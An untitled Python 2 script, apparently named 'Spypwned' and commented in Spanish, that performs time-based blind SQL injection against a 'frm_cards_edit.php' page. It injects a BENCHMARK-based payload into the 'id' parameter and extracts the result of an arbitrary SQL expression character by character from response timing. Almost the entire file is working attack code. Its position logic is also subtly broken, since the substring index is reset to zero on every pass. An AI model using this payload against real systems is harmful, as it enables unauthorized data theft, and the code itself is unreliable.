Untitled

from httplib import HTTPConnection
from time import time
from sys import exit, argv, stdout
import urllib
print """
  Example:
  Spypwned 192.168.0.12 /directorio/ "version()"

"""

if len(argv)<=3: exit()
else:   print "[+]Iniciando..."

host = argv[1]
path = argv[2]
sql = argv[3]
port = 80


hash = ""
full = []

for k in range(48,122):
    full.append(k)
full.append(0)
# full vale [48, 49, 50, 51, 52, 53, 54, 55, 56, 57, 58, 59, 60, 61, 62, 63, 64, 65, 66, 67, 68, 69, 70, 71, 72, 73, 74, 75, 76, 77, 78, 79, 80, 81, 82, 83, 84, 85, 86, 87, 88, 89, 90, 91, 92, 93, 94, 95, 96, 97, 98, 99, 100, 101, 102, 103, 104, 105, 106, 107, 108, 109, 110, 111, 112, 113, 114, 115, 116, 117, 118, 119, 120, 121, 0]
# Es el charset a probar

delay = 0.5
a=1
while a <= 32:
    for i in full:
        j = 0
        if i == 0:  exit('\n[+]FIN\n')
        #
        start = time()
        # hora de inicio para el delay
        conn = HTTPConnection(host,port)
        #values = { "id" : "1 AND (SELECT IF((IFNULL(ASCII(SUBSTRING((4.0.5),a,1)),0)="K"),BENCHMARK(9000000,SHA1(1)),1));-- /*" }
        values = { "id" : "1 AND (SELECT IF((IFNULL(ASCII(SUBSTRING((" + sql + ")," + str(j) + ",1)),0)=" + str(i) + "),BENCHMARK(9000000,SHA1(1)),1));-- /*" }
        data = urllib.urlencode(values)
        print data
        conn.request("GET", path + "frm_cards_edit.php?" + data )
        response = conn.getresponse()
        read = response.read()
        print read

        if response.status == 404: exit('[+]404')
        # da 404 luego termina
        now = time()
        if now - start > delay:
        # ha salido true luego el caracter es valido
            stdout.write(chr(i))
            stdout.flush()
            hash += chr(i)
            a += 1
            break;
        else: j += 1
        print "i vale %s, y J vale %s" %(i,j)